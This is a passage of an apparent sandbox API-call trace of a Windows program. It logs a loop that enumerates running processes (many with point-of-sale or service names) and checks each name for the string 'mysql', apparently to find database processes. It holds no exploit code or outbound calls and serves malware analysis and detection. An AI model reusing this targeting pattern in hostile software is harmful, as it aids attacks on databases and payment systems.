th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0091.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0091.841] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x355b938 [0091.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x355b938, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0091.841] lstrcpyA (in: lpString1=0x567fabc, lpString2="creditservice.exe" | out: lpString1="creditservice.exe") returned="creditservice.exe" [0091.842] StrStrIA (lpFirst="creditservice.exe", lpSrch="mysql") returned 0x0 [0091.842] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0091.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.843] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541de8 [0091.843] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x3541de8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0091.843] lstrcpyA (in: lpString1=0x567fabc, lpString2="edcsvr.exe" | out: lpString1="edcsvr.exe") returned="edcsvr.exe" [0091.843] StrStrIA (lpFirst="edcsvr.exe", lpSrch="mysql") returned 0x0 [0091.843] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0091.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.844] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3541d88 [0091.844] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x3541d88, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0091.844] lstrcpyA (in: lpString1=0x567fabc, lpString2="fpos.exe" | out: lpString1="fpos.exe") returned="fpos.exe" [0091.844] StrStrIA (lpFirst="fpos.exe", lpSrch="mysql") returned 0x0 [0091.845] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xeb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0091.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.846] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541e00 [0091.846] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x3541e00, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0091.846] lstrcpyA (in: lpString1=0x567fabc, lpString2="isspos.exe" | out: lpString1="isspos.exe") returned="isspos.exe" [0091.846] StrStrIA (lpFirst="isspos.exe", lpSrch="mysql") returned 0x0 [0091.846] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0091.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.849] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x355b958 [0091.849] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x355b958, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0091.849] lstrcpyA (in: lpString1=0x567fabc, lpString2="mxslipstream.exe" | out: lpString1="mxslipstream.exe") returned="mxslipstream.exe" [0091.849] StrStrIA (lpFirst="mxslipstream.exe", lpSrch="mysql") returned 0x0 [0091.849] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0091.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.852] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541e30 [0091.852] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x3541e30, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0091.852] lstrcpyA (in: lpString1=0x567fabc, lpString2="omnipos.exe" | out: lpString1="omnipos.exe") returned="omnipos.exe" [0091.852] StrStrIA (lpFirst="omnipos.exe", lpSrch="mysql") returned 0x0 [0091.852] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0091.853] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.853] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3541ef0 [0091.854] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x3541ef0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0091.854] lstrcpyA (in: lpString1=0x567fabc, lpString2="spcwin.exe" | out: lpString1="spcwin.exe") returned="spcwin.exe" [0091.854] StrStrIA (lpFirst="spcwin.exe", lpSrch="mysql") returned 0x0 [0091.854] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0091.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0091.856] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x3536db0 [0091.856] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x3536db0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0091.856] lstrcpyA (in: lpString1=0x567fabc, lpString2="spgagentservice.exe" | out: lpString1="spgagentservice.exe") returned="spgagentservice.exe" [0091.856] StrStrIA (lpFirst="spgagentservice.exe", lpSrch="mysql") returned 0x0 [0091.856] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0091.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.858] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3541ea8 [0091.858] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x3541ea8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0091.858] lstrcpyA (in: lpString1=0x567fabc, lpString2="utg2.exe" | out: lpString1="utg2.exe") returned="utg2.exe" [0091.858] StrStrIA (lpFirst="utg2.exe", lpSrch="mysql") returned 0x0 [0091.858] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1018, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="saying.exe")) returned 1 [0091.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0091.860] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542058 [0091.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="saying.exe", cchWideChar=-1, lpMultiByteStr=0x3542058, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="saying.exe", lpUsedDefaultChar=0x0) returned 11 [0091.860] lstrcpyA (in: lpString1=0x567fabc, lpString2="saying.exe" | out: lpString1="saying.exe") returned="saying.exe" [0091.860] StrStrIA (lpFirst="saying.exe", lpSrch="mysql") returned 0x0 [0091.860] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="ripe.exe")) returned 1 [0091.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.862] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3541f68 [0091.862] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="ripe.exe", cchWideChar=-1, lpMultiByteStr=0x3541f68, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ripe.exe", lpUsedDefaultChar=0x0) returned 9 [0091.862] lstrcpyA (in: lpString1=0x567fabc, lpString2="ripe.exe" | out: lpString1="ripe.exe") returned="ripe.exe" [0091.862] StrStrIA (lpFirst="ripe.exe", lpSrch="mysql") returned 0x0 [0091.862] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="acoustic.exe")) returned 1 [0091.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.864] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542070 [0091.864] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="acoustic.exe", cchWideChar=-1, lpMultiByteStr=0x3542070, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="acoustic.exe", lpUsedDefaultChar=0x0) returned 13 [0091.864] lstrcpyA (in: lpString1=0x567fabc, lpString2="acoustic.exe" | out: lpString1="acoustic.exe") returned="acoustic.exe" [0091.864] StrStrIA (lpFirst="acoustic.exe", lpSrch="mysql") returned 0x0 [0091.864] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="mail.exe")) returned 1 [0091.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0091.865] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3541e90 [0091.865] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="mail.exe", cchWideChar=-1, lpMultiByteStr=0x3541e90, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mail.exe", lpUsedDefaultChar=0x0) returned 9 [0091.865] lstrcpyA (in: lpString1=0x567fabc, lpString2="mail.exe" | out: lpString1="mail.exe") returned="mail.exe" [0091.865] StrStrIA (lpFirst="mail.exe", lpSrch="mysql") returned 0x0 [0091.865] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0091.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0091.867] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3541db8 [0091.867] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x3541db8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0091.867] lstrcpyA (in: lpString1=0x567fabc, lpString2="WmiPrvSE.exe" | out: lpString1="WmiPrvSE.exe") returned="WmiPrvSE.exe" [0091.867] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="mysql") returned 0x0 [0091.867] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0091.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.868] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541ec0 [0091.868] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3541ec0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.868] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0091.868] StrStrIA (lpFirst="svchost.exe", lpSrch="mysql") returned 0x0 [0091.868] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0091.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.870] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541f20 [0091.870] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x3541f20, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.870] lstrcpyA (in: lpString1=0x567fabc, lpString2="dllhost.exe" | out: lpString1="dllhost.exe") returned="dllhost.exe" [0091.870] StrStrIA (lpFirst="dllhost.exe", lpSrch="mysql") returned 0x0 [0091.870] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1208, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0091.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.871] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3541fc8 [0091.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3541fc8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0091.871] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0091.871] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mysql") returned 0x0 [0091.871] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0091.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.881] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3541e48 [0091.881] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UsoClient.exe", cchWideChar=-1, lpMultiByteStr=0x3541e48, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UsoClient.exe", lpUsedDefaultChar=0x0) returned 14 [0091.881] lstrcpyA (in: lpString1=0x567fabc, lpString2="UsoClient.exe" | out: lpString1="UsoClient.exe") returned="UsoClient.exe" [0091.881] StrStrIA (lpFirst="UsoClient.exe", lpSrch="mysql") returned 0x0 [0091.881] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0091.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0091.882] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3541f38 [0091.882] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="taskhostw.exe", cchWideChar=-1, lpMultiByteStr=0x3541f38, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskhostw.exe", lpUsedDefaultChar=0x0) returned 14 [0091.882] lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0091.882] StrStrIA (lpFirst="taskhostw.exe", lpSrch="mysql") returned 0x0 [0091.882] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0091.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0091.884] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3536f50 [0091.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3536f50, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0091.884] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0091.884] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="mysql") returned 0x0 [0091.885] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0091.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.886] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3536bb0 [0091.886] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3536bb0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0091.886] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0091.886] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="mysql") returned 0x0 [0091.886] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0091.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0091.887] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x355cb28 [0091.887] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x355cb28, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0091.888] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0091.888] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="mysql") returned 0x0 [0091.888] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0091.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0091.889] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3541f50 [0091.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3541f50, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0091.889] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0091.889] StrStrIA (lpFirst="conhost.exe", lpSrch="mysql") returned 0x0 [0091.889] Process32NextW (in: 